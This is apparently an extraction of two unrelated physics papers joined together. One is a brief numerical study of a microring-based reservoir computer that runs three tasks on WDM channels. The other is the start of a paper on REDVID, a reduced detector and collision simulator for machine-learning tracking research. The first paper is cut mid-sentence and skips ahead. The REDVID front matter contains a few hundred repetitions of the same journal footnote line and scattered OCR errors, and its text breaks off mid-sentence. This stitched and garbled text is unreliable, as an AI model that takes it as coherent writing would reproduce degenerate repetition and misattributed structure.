# Multi-parallel-task Time-delay Reservoir Computing combining a Silicon Microring with WDM ###### Abstract We numerically demonstrate a microring-based time-delay reservoir computing scheme that simultaneously solves three tasks involving time-series prediction, classification, and wireless channel equalization. Each task performed on a wavelength-multiplexed channel achieves state-of-the-art performance with optimized power and frequency detuning. (c) 2023 The Author(s) ## 1 Introduction The growth of computing demanding applications is pushing the design of novel hardware accelerators with higher power efficiency and a boost in computing power [1]. Photonic computing has emerged as a promising alternative for delivering the required computational power in upcoming years. Well-developed technologies from optical communications, such as wavelength division multiplexing (WDM), have proven to be feasible for photonic parallel computing as multiple computing tasks can be simultaneously addressed on different optical channels [2]. Within machine learning schemes and, more specifically, recurrent neural networks, we focus our attention on reservoir computing (RC), which is characterized by the ability to buffer past inputs and provide complex nonlinear dynamics. Furthermore, it only requires a simple linear (ridge) regression training of its output layer. RC schemes have demonstrated good performance in speech recognition, time series prediction applications [2]. Time-delay RC (TDRC) schemes have the further advantage of minimizing the number of required physical nonlinear nodes by multiplexing in time virtual nodes. In TDRC, the response of each node is processed, one at a time, in a single physical nonlinear node. In [2] the nonlinear node is realized using Mach-Zehnder modulators, and more recently with microring resonators (MRRs) [3, 4]. In the latter case, the required nonlinear behaviour is provided by the silicon MRR through the free-carrier dispersion (FCD) and thermo-optic (TO) nonlinear effects, which emerge from two-photon absorption (TPA). In [3, 4], only one optical carrier with a wavelength close to that of a resonance of the MRR cavity was used, allowing the RC to process and solve a single task. In this work, we triple the computing capacity of MRR-based TDRC schemes by using three of the resonances of a single add-drop MRR to process three optical carriers in parallel, each detuned from its corresponding resonance. Therefore, a different task is solved per optical carrier. The three tasks cover a diversity of TDRC applications that are solved simultaneously with a good performance in terms of their respective metrics. This offers a higher computing potential than other TDRC schemes that solve just a single task at a time. ## 2 RC setup, methodology of the simulations and benchmarks. The proposed TDRC scheme is shown in Fig 1. The three conventional TDRC benchmarking tasks solved simultaneously follow the details of [5] for the definitions of the input signals and the masking procedures. A 1-GBd input symbol sequence is used per task. The first task is a time-series prediction (NARMA-10 task), evaluated in terms of normalized mean square error (NMSE) on the testing set. The second one is a signal classification (SC) task, in which we determine the accuracy of RC at correctly recognizing between sine and rectangular signals by dividing the number of accurate predictions over their total number. The third task is the equalization of a signal propagated through a wireless channel affected by noise and nonlinear distortion, in which the RC targets to reconstruct the original signal. For this task, we calculate the symbol error ratio (SER) of the testing set at a signal-to-noise ratio (SNR) of 32 dB. The input sequence \(u_{i}\)_(\(n\))_ of each task \(i\), is multiplied by its respective masking signal \(m_{i}\)_(\(n\)) for \(N=50\) virtual nodes and an optimized task-independent bias \(\beta\) is added to their product, as done in [3]. Each of the resulting signals modulates the intensity of its respective optical carrier before being wavelength-multiplexed and injected into the ## 3 Adapted physical model for FCD and TO nonlinearities with multiple optical carriers A temporal coupled-mode theory (TCMT) approach is extended to model an add-drop MRR with multiple input WDM signals in its cavity [3, 6, 7]. We account for the modal energy of the ith modulated carrier per RC task, \(a_{i}(t)\), with a frequency \(\omega_{i}\) close to its assigned resonance frequency \(\omega_{r_{i}}\). The model includes individual contributions of each optical carrier to the total rate of change of the mode-averaged temperature with respect to the environment (\(\Delta T\)) and the excess free-carrier density generated via TPA (\(\Delta N\)). The model is defined for an \(M\) number of optical carriers as: \[\frac{\mathrm{d}a_{i}(t)}{\mathrm{d}t}=\big{[}j\delta_{i}(t)-\gamma_{\mathrm{ tot}i}(t)\big{]}a_{i}(t)+i\left\lceil\frac{2}{\tau_{c}}\Big{(}E_{\mathrm{in}_{i} }(t)+E_{\mathrm{add}i}(t)\Big{)}\,e^{j\omega_{i}t},\right. \tag{1}\] \[\left.\frac{\mathrm{d}\Delta T(t)}{\mathrm{d}t}=-\frac{\Delta T(t)}{\tau_{th} }+\frac{2\Gamma_{\mathrm{th}}}{mc_{\mathrm{p}}}\bigg{[}\sum_{i=1}^{M}|a_{i}(t )|^{2}P_{\mathrm{abs}_{i}}(t)\right], \tag{2}\] \[\left.\frac{\mathrm{d}\Delta N(t)}{\mathrm{d}t}=-\frac{\Delta N(t)}{\tau_{ \mathrm{FC}}}+\sum_{i=1}^{M}\frac{\Gamma_{\mathrm{FCA}}c^{2}\beta_{\mathrm{TPA}}}{2 \hbar\omega_{i}V_{\mathrm{FCA}}^{2}n_{\mathrm{Si}}^{3}}\,|a_{i}(t)|^{4}\,,\right. \tag{3}\] where \(\delta_{i}(t)\) is the total angular frequency detuning per carrier including carrier-resonance (\(\omega_{i}-\omega_{r_{i}}\)) detuning as well as TO and FCD-induced detuning as in (4). \(\gamma_{\mathrm{tot}}(t)\) and \(P_{\mathrm{abs}}(t)\) denote the total losses and power absorbed in the cavity and are expressed in Eq. (5) and (6), respectively. \(\gamma_{\mathrm{TPA/FCA}}\) are the losses due to FCA and TPA. The fields at the input and add ports are expressed by \(E_{\mathrm{in}_{i}}(t)\) and \(E_{\mathrm{add}i}(t)\) for \(\omega_{i}\). \(\Gamma_{\mathrm{FC}}\) is the lifetime of the carriers, \(\tau_{th}\) is the heat diffusion time constant, and \(m\) is the mass of the MRR. \(\Gamma_{\mathrm{FCA/th}}\) refer to the FCA and thermal confinement factors. \(n_{\mathrm{Si}}\), \(\beta_{\mathrm{TPA}}\) and \(c_{\mathrm{p}}\), are silicon's refractive index, TPA coefficient, and specific heat, respectively. \(V_{\mathrm{FCA/TPA}}\) are the FCA and TPA effective volume. \(\sigma_{\mathrm{FCA}}\) is the total FCA cross-section. In Eq. (4) - (6) \(\mathrm{d}n/\mathrm{d}N\) and \(\mathrm{d}n/\mathrm{d}T\) are the silicon FCD and TO coefficients, respectively. \(\alpha\) is the waveguide attenuation and \(\tau_{c}\) is the energy decay rate due to the coupling between the MRR and the bus waveguides. The values of the silicon constants, \(\Gamma_{\mathrm{FCA/th}}\) and \(V_{\mathrm{FCA/TPA}}\) are taken from [3]. The rest of the parameter values are listed in Fig. 1. \[\delta_{i}(t)=\omega_{i}-\omega_{r_{i}}-\frac{\omega_{r_{i}}}{n_{\mathrm{Si}}} \Bigg{(}-\frac{\mathrm{d}n_{\mathrm{Si}}}{\mathrm{d}N}\Delta N(t)-\frac{ \mathrm{d}n_{\mathrm{Si}}}{\mathrm{d}T}\Delta T(t)\Bigg{)}, \tag{4}\] \[\gamma_{\mathrm{tot}_{i}}(t)=\frac{c\alpha}{n_{\mathrm{Si}}}+\frac{2}{\tau_{c} }+\gamma_{\mathrm{TPA}_{i}}+\gamma_{\mathrm{FCA}}=\frac{c\alpha}{n_{\mathrm{ Si}}}+\frac{2}{\tau_{c}}+\frac{\beta_{\mathrm{TPA}}c^{2}}{n_{\mathrm{Si}}^{2}V_{ \mathrm{TPA}}}|a_{i}(t)|^{2}+\frac{\Gamma_{\mathrm{FCA}}\sigma_{\mathrm{FCA}} c}{2n_{\mathrm{Si}}}\cdot\Delta N(t)\;, \tag{5}\] \[P_{\mathrm{abs}_{i}}(t)=\Bigg{(}\frac{c\alpha}{n_{\mathrm{Si}}}+\frac{\beta_{ \mathrm{TPA}}c^{2}}{n_{\mathrm{Si}}^{2}V_{\mathrm{TPA}}}|a_{i}(t)|^{2}+\frac{ \Gamma_{\mathrm{FCA}}\sigma_{\mathrm{FCA}}c}{2n_{\mathrm{Si}}}\cdot\Delta N(t) \Bigg{)}\,|a_{i}(t)|^{2}. \tag{6}\] Figure 1: Proposed TDRC setup scheme. On the right side, the frequency allocation used in this work. ## 4 Results and discussion. As in [4], Eq. (1) - (3) are normalized and solved using a 4\({}^{\rm th}\) order Runge-Kutta solver with a 2.0 ps step. First, we perform the simulation of the system by considering a range of \(-\)20 to \(+\)25 dBm of total average input power which is split equally between the three optical carriers (\(\bar{P}_{0}=\bar{P}_{1}=\bar{P}_{2}\)). For this simulation we also consider an equal carrier-resonance detuning (\(\Delta\omega_{0}=\Delta\omega_{1}=\Delta\omega_{2}\)) spanning the \(\pm\)100 GHz range. The results for each task are shown in Fig. 2 as a function of \(\bar{P}_{\rm i}\) and \(\Delta\omega_{i}/2\pi\), where a red circle indicates their best observed performance. Minima and maxima values per task metric are also displayed as extremes values of the colorbar legends. We observe that the time-series (NARMA-10) prediction (Fig. 2a) and classification (Fig. 2b) tasks share a common area of good performance (low error prediction or high accuracy) which extends over a similar parameter space (\(\bar{P}_{\rm i}\), \(\Delta\omega_{i}\)). In the case of the wireless channel equalization task (Fig. 2c), the parameter space of the lowest SER is located at higher levels of \(\bar{P}_{\rm i}\) than for the NARMA-10 or SC tasks and is limited to a smaller input power range. In fact, the parameter space in which the NARMA-10 and SC tasks achieve their best performance overlaps the one in which the channel equalization task presents high SER. This highlights the different nature of computing requirements in terms of memory and nonlinearity from each task in this setup. However, this also implies that under the previous simulation conditions we cannot expect optimum performance simultaneously for the three tasks. Nevertheless, without targeting a complex full 6-D optimization, we still can exploit the results of Fig. 2 as a basis to test that the three tasks can be simultaneously solved with good performance. Therefore we simulate the system with the carrier power and \(\Delta\omega_{i}\) values corresponding to the best observed performance for each task: [\(\bar{P}_{0}=0\) dBm, \(\bar{P}_{1}\) = -10.0 dBm, \(\bar{P}_{2}\)= 15.0 dBm], and \(\Delta\omega_{i}\): [\(\Delta\omega_{0}/2\pi\) = -60 GHz, \(\Delta\omega_{1}/2\pi\) = -45 GHz, \(\Delta\omega_{2}/2\pi\) = -20 GHz]. A minimum NMSE of 0.0373 is obtained for the NARMA-10 task, which is slightly higher than in [3] when using a single optical carrier MRR-based TDRC with the same physical parameters, but still lower than in [8]. In the SC task, we obtain a maximum accuracy of 0.991, which is a very good performance for this task [5]. Finally, for the channel equalization task we find a minimum SER of \(7.0\times 10^{-4}\), which is comparable to [2, 5, 8]. Therefore, under the forementioned conditions, each solved task suffers a slight performance penalty with respect to their best results (Fig. 2). Nonetheless, the results are still comparable to previous works [2, 3, 5, 8] while achieving parallel computing of the tasks. ## 5 Conclusion. The potential of a WDM MRR-based TDRC scheme to solve simultaneously and with good performance three conventional TDRC tasks is numerically demonstrated. Here, we limit the analysis to three simultaneous tasks, however higher degree of parallelization could be possible using more MRR resonances. The results indicate the possibility of fine tuning the power and frequency detuning of each channel, carrying a distinct task, to simultaneously achieve near optimal performance. The performance of each task is comparable to state-of-the-art results of previous single-task TDRC implementations. **Acknowledgment** Villum Fonden (OPTIC-AI grant n. VIL29334), Vetenskapsradet (BRAIN, grant n. 2022-04798) and ERC-CoG FRECOM project (no. 771878).
2309.03780
Reduced Simulations for High-Energy Physics, a Middle Ground for Data-Driven Physics Research
Subatomic particle track reconstruction (tracking) is a vital task in High-Energy Physics experiments. Tracking is exceptionally computationally challenging and fielded solutions, relying on traditional algorithms, do not scale linearly. Machine Learning (ML) assisted solutions are a promising answer. We argue that a complexity-reduced problem description and the data representing it, will facilitate the solution exploration workflow. We provide the REDuced VIrtual Detector (REDVID) as a complexity-reduced detector model and particle collision event simulator combo. REDVID is intended as a simulation-in-the-loop, to both generate synthetic data efficiently and to simplify the challenge of ML model design. The fully parametric nature of our tool, with regards to system-level configuration, while in contrast to physics-accurate simulations, allows for the generation of simplified data for research and education, at different levels. Resulting from the reduced complexity, we showcase the computational efficiency of REDVID by providing the computational cost figures for a multitude of simulation benchmarks. As a simulation and a generative tool for ML-assisted solution design, REDVID is highly flexible, reusable and open-source. Reference data sets generated with REDVID are publicly available. Data generated using REDVID has enabled rapid development of multiple novel ML model designs, which is currently ongoing.
Uraz Odyurt, Stephen Nicholas Swatman, Ana-Lucia Varbanescu, Sascha Caron
2023-08-30T12:50:45Z
http://arxiv.org/abs/2309.03780v2
# Reduced Simulations for High-Energy Physics, a Middle Ground for Data-Driven Physics Research ###### Abstract. Subatomic particle track reconstruction (tracking) is a vital task in High-Energy Physics experiments. Tracking is exceptionally computationally challenging and fielded solutions, relying on traditional algorithms, do not scale linearly. Machine Learning (ML) assisted solutions are a promising answer. We argue that a complexity-reduced problem description and the data representing it, will facilitate the solution exploration workflow. We provide the REDuced Virtual Detector (REDVID) as a complexity-reduced detector model and particle collision event simulator comb. REDVID is intended as a simulation-in-the-loop, to both generate synthetic data efficiently and to simplify the challenge of ML model design. The fully parametric nature of our tool, with regards to system-level configuration, while in contrast to physics-accurate simulations, allows for the generation of simplified data for research and education, at different levels. Resulting from the reduced complexity, we showcase the computational efficiency of REDVID by providing the computational cost figures for a multitude of simulation benchmarks. As a simulation and a generative tool for ML-assisted solution design, REDVID is highly flexible, reusable and open-source. Reference data sets generated with REDVID are publicly available. Reduced-order modelling, Simulation, Machine learning, High-energy physics, Synthetic data + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: journal: Computer Physics Communications + Footnote †: journal: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications + Footnote †: journal: Computer Physics Communications can be much faster through the informed simplification of the design-space for the ML-assisted solution. Our methodology is specifically being considered for the tracking use-case. We have designed and implemented the _REDUaced Virtual Detector (REDVID)_, to both simplify the problem at hand and to act as an efficient tool for frequent simulations and synthetic data generation. While our tool is not a physics-accurate one, it does respect the high-level relations present in subatomic particle collision events and detector interactions. REDVID is fully (re)configurable, allowing definition of experiments through varying detector models, while preserving the _cascading effects_ of every change. Considering possible complexity reduction strategies, the spectrum varies from physics-accurate data manipulations, e.g., dimensionality/granularity reduction, to omitting the scenario interactions beforehand. A strategy solely based on data reduction will fail to preserve the behavioural integrity of the system, as it will fail to propagate cascading effects resulting from reductions. Even simplified examples such as the TrackML data (Beng et al., 2015) are too complex. ContributionWe provide REDVID, an experiment-independent, fully (re)configurable, and complexity-reduced simulation framework for HEP (Han et al., 2017). Simulations consist of complexity-reduced detector models, alongside a particle collision event simulator with reduced behavioural-space. REDVID is intended as a simulation-in-the-loop for ML model design workflows, providing: * Problem simplification facilitates ML solution design, as opposed to real-world use-case definitions, which are often too complex to negotiate directly. * The model generator is capable of spawning detectors based on reconfigurable geometries. * Behavioural-space reductions directly improve event simulation and processing times. Our other contributions include: * Supporting pedagogical tasks in higher education by presenting complex interactions from HEP experiments through simplified and understandable data. * We have generated and made publicly available a number of reference data sets, which are of independent interest for physicists and data scientists alike (Hernandez et al., 2017). This introduction is followed by Section 2, providing the background on HEP experiments and similar simulators. In Section 3, we provide the design details considered for REDVID. Notable implementation techniques are elaborated in Section 4. Data set related results are given in Section 5, followed by Sections 6 and 7, covering the relevant literature and our conclusions, respectively. ## 2. Background and Motivation We elaborate the premise of HEP experiments, as well as the role of simulation in these, to get familiar with the context of our use-case. ### HEP experiments When talking about the HEP experiments, we refer to high-energy particle collision events. Two types of collision experiments are performed at LHC, proton-proton and ion-ion collisions. Protons are extracted from hydrogen atoms, while ions are actually heavy lead ions. Beams of particles are sent down the beam pipe in opposing directions and made to collide at four specific spots. These four spots are the residing points of the four major detectors installed at LHC, namely, ALICE (Hernandez et al., 2017), CMS (Hernandez et al., 2018), LHCb (Hernandez et al., 2018) and ATLAS (Hernandez et al., 2018). Take the ATLAS detector for instance. The role played by ATLAS in the study of fundamental particles and their interactions relies on two main tasks, _tracking_ and _calorimetry_. Through tracking, i.e., particle track reconstruction, the momentum, \(p\), of a particle can be calculated, while the energy, \(E\), is calculated through calorimetry. Having the momentum and the energy for a given particle, its mass, \(m\), can be calculated, following the _energy-momentum relation_ expressed as, \[E^{2}=(mc^{2})^{2}+(pc)^{2}\,.\] In the above equation, \(c\) represents the speed of light and is a constant. The mass measurement allows the study of the properties for known particles, as well as potentially discovering new unknown ones. As such, it is fair to state that _particle track reconstruction is one of the major tasks in high-energy physics_. ### Role of simulation in HEP Simulation allows for, amongst others, the validation and training of particle track reconstruction algorithms. Two distinguished stages are considered for HEP event simulations, i.e., _physics event generation_ and _detector response simulation_(Hernandez et al., 2017). Event generation as the first stage, involves the simulation of particle collision events, encompassing the processes involved in the initial proton-proton or ion-ion interactions. Event generation is governed by intricate sets of physical rules and is performed by software packages such as Herwig (Herwig, 2010) and Pythia (Pythia, 2012), i.e., physics-accurate simulations. Detector response simulation as the second stage, integrates the movement of the particles generated by the first stage through a detector geometry, simulating the decay of unstable particles, the interactions between particles and matter, electromagnetic effects, and further physical processes such as hadronisation. Common event simulators providing such functionality include Geant4 (Geant4, 2013), FLUKA (Hernandez et al., 2017), and MCNP (Hernandez et al., 2017). In accelerator physics applications, event simulators are used to simulate the interactions between particles and sensitive surfaces in an experiment, as well as with so-called passive material, such as support beams. Interactions with sensitive surfaces may undergo an additional _digitisation_ step, simulating the digital signals that can be read out of the experiment. Considering the example of ATLAS, three data generating simulators can be considered, namely, Geant4, FAIRAS (Hernandez et al., 2017) and ATLFAST (Perez-Hernandez et al., 2018). Following the Monte Carlo simulation approach, FATRAS has been designed to be a fast simulator. It is capable of trajectory building based on a simplified reconstruction geometry and does provide support for material effects, as well as particle decay. FATRAS also generates hit data. ATLFAST follows a different approach towards trajectory simulation and doesn't generate hit data, making it unsuitable for tracking studies. ATLFAST relies on hard-coded smearing functions based on statistics from full simulations. These functions are dependent on particle types, momentum ranges and vertex radii. Such details are specific to the design elements of the virtual detector geometry. A change in the design will require finding new functions. REDVID fills the gap for a reconfigurable framework that is suitable for first-phase solution exploration and design. This is due to the deliberate reduction in complexity, for both the generated data and the problem description, while keeping the high-level causal relations in place. REDVID is end-to-end parametric, i.e., all the generated data is built upon the detector geometry and randomised particle trajectories, both reconfigurable. REDVID has been developed in Python, making its integration with Python-based ML design workflows seamless. Figure 1 plots REDVID's positioning versus other well-known tools, as we consider it. ## 3. Simulation Application and Design The question here is how best one can go about designing and training a capable and rigorous ML model? The higher the complexity of a system and its associated data, the harder it is to arrive at an efficient ML model design solving the task. Generally speaking, complex tasks require larger models. Considering the upcoming High-Luminosity LHC upgrade (Beng et al., 2017), this complexity will increase even further. Addressing real-world tasks directly will require synthesising close to real-world data, which can be performed by high-accuracy simulations. High-accuracy simulations in general and physics-accurate simulations in particular are extremely expensive computational tasks. Having such tools as part of a workflow, e.g., ML model design workflows, triggering frequent executions of the simulation with altered configuration, will inevitably turn into a serious challenge. Even if there are accommodating hardware resources available, algorithmic limitations will turn these tools into workflow bottlenecks. Yet another notable drawback is the high cost of energy when running frequent computationally expensive tasks. Accordingly, it is highly beneficial, and perhaps necessary, to not only design reduced models and simulators1, but to provide parametric (re)configurability to support automated exploration. Footnote 1: A model and a simulator go hand in hand to form a simulation. However, the initial testing of new solutions (ML model designs) does not require the ground truth, which physics-accurate simulations are capable of producing. A cost-effective and reduced simulation that would preserve the behavioural relations of the complex system (proton-proton/ion-ion collision event experiments) can be integrated in ML model design workflows, as shown in Figure 2. ### Reduction approach Simulations of complex systems include a virtual model(s) and mimic the behaviour of the system under scrutiny. On the one hand, the amount of detail included in the model, as a virtual representation of the complex system, will directly affect the approximation level of the simulation. On the other hand, the extent of behaviour considered by a simulator while executing the model, will determine the overall achieved complexity. _Having a validly approximate representation is achieved through the reduction of the behavioural-space to a minimal subset, best encapsulating the complex system._ Both model complexity and simulator complexity can be targets of such a reduction. The first and foremost effect of an approximate simulation is better computational efficiency. Note that there can be many such approximations, depending on the intended balance between computational efficiency and behavioural approximation level. The other advantage, especially when it comes to ML model design processes, is facilitation of an effective model design by providing a middle ground that has a lower complexity and can be used for better understanding of the challenge and testing of the early designs, before addressing the full real-world case. Solution exploration/design in general and solutions based on ML models in particular, has always benefited from methodical simplification of the problem at hand. For a system operating over a broad behavioural-space, such a simplification often is manifested by means of high-level modelling. Both actual experiments and physics-accurate simulations for our use-case, i.e., proton-proton/ion-ion collision events inside a detector such as the ATLAS detector, are immensely complex. Dropping of the physics-accurate characteristics results in major behavioural-space reductions. This applies to both the detector model and the behaviour affecting the event simulator. While moving away from physics-accuracy, our aim has been to conserve logical, mathematical and geometrical relations, which would provide the basis for a flexible parameterisation. Preserving relations between interacting elements of a system preserves occurrence of _cascading effects_ when the system is being steered through reconfiguration. For instance, a change in the structural definition of the detector model will affect the recorded hit points during the event simulation. It must be noted that we have intentionally avoided the time dimension complexities. Accordingly, a list of major reductions that we have considered follows. _Simplified detector geometry._ The real detector has a complex geometry, with many small sensors acting collectively to record particle interactions. For instance, a barrel sub-detector type is built using many smaller modules, ultimately forming a cylindrical shape. Figure 1. Simulation complexity spectrum is shown from the most simplistic to the most realistic, with high complexity rates for both model and simulator. Depending on the enabled features, different simulators are capable of providing different levels of complexity, depicted as grey areas. ATLFAST is not included for lack of hit data generation. Note that this figure does not cover data reduction strategies, which is not relevant to changes in model or simulator complexity. There are also supporting subsystems, e.g., for cooling, which occupy parts of the detector space. We have considered much simpler elements for the geometry of our virtual detector model, consisting of elements with 